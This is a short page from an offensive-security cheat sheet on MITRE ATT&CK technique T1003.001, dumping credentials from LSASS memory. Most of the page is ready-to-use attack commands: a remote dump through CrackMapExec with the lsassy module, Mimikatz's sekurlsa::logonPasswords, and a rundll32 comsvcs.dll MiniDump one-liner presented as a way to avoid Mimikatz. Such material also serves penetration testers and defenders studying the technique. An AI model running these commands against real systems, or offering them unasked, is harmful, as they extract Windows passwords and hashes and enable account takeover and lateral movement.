LSASS Memory

MITRE ATT&CK, Credential Access, Sub-technique T1003.001

Adversaries commonly abuse the Local Security Authority Subsystem Service (LSASS) to dump credentials for privilege escalation, data theft, and lateral movement. The process is a fruitful target for adversaries because of the sheer amount of sensitive information it stores in memory.

Dumping LSASS

# Dumping LSASS remotely with CrackMapExec
crackmapexec smb $ip -u $username -p $password -M lsassy

# Dumping LSASS with Mimikatz
sekurlsa::logonPasswords

Dumping LSASS without Mimikatz

## https://twitter.com/inversecos/status/1450331995112804358?s=20&t=rMzsQI6ENH2SYVVaTYTqAA
rundll32.exe comsvcs.dll, MiniDump (Get-Process lsass).Id Temp\output.dmp full;Wait-Process -Id (Get-Process rundll32).id

References

LSASS Memory - Threat Detection Report - Red CanaryRed Canary

OS Credential Dumping: LSASS Memory, Sub-technique T1003.001 - Enterprise | MITRE ATT&CK®

PreviousLSA Secrets NextNTDS

Last updated 1 year ago